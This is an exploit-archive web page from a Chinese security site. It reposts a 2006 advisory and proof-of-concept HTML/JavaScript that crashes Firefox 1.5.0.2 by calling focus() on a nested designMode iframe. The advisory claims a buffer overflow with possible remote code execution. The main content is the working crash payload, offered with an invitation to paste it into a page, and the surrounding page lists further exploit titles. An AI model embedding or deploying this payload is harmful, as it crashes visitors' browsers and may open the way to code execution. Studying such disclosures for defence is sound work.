首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC
来源:http://www.securident.com/ 作者:splices 发布时间:2006-04-25  

<!--
---------------------------------------------------
Software:
Firefox Web Browser
Tested:
Linux, Windows clients' version 1.5.0.2
Result:
Firefox Remote Code Execution and Denial of Service - Vendor contacted, no patch yet.
Problem:
A handling issue exists in how Firefox handles certain Javascript in js320.dll and xpcom_core.dll
regarding iframe.contentWindow.focus(). By manipulating this feature a buffer overflow will occur.
Proof of Concept:
http://www.securident.com/vuln/ff.txt
Credits:
splices(splices [dot] org)
spiffomatic64(spiffomatic64 [dot] com)
Securident Technologies (securident [dot] com)
------------------------------------------------

http://www.securident.com/vuln/ffdos.htm - PoC firefox dos

Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above. -->

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

<!--
-DISCLAIMER-
splices,spiffomatic64, and securident are not responsible for any of the information contained therein,
this is all just for informational purposes only. -->



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FlexBB <= 0.5.5 (function/s
·Fenice OMS 1.10 (long get requ
·Apple Mac OS X Safari <= 2.
·OCE 3121/3122 Printer (parser.
·My Gaming Ladder Combo System
·Oracle <= 10g Release 2 (DB
·PHPSurveyor <= 0.995 (surve
·Invision Power Board <= 2.1
·PCPIN Chat <= 5.0.4 (login/
·BL4 SMTP Server < 0.1.5 Rem
·Mambo <= 4.5.3 , Joomla <
·TopList <= 1.3.8 (phpBB Hac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved